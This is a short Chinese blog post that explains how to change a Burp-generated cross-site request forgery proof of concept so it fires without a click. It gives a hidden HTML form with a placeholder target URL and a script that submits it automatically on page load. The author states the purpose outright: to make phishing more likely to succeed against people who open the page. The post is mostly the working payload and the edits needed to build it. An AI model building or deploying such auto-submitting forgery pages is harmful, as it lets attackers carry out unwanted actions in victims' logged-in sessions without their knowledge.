不用点击的csrf代码生成。

发布于 2020-11-08  46 次阅读


CSRF即跨站请求伪造,通常用于钓鱼,平时用burp可自动生成CSRF的poc,但是每次打开HTML文件会有点击按钮,鱼儿不好上钩。

csrf的点击按钮

于是通常会对代码进行一些改变。这里是取消点击按钮,把点击动作交给浏览器来做,以增加钓鱼成功的几率。

代码如下:

<html>
<body>
<form style="display:none;" name="px" method="post" action="链接地址">
<input type="text" name="username" value="我是傻逼">
</form>
<script>
document.px.submit();
</script>
</body>
</html>

其中点击动作用document来完成了。在burp的POC进行两处添加。

下面是修改方式

生成自己的csrf代码之后,在<form>标签之中添加以下属性:

style="display:none;" name="px"

然后在form表格后面添加点击动作

<script>
document.px.submit();
</script>


学不动了,带带孩子吧。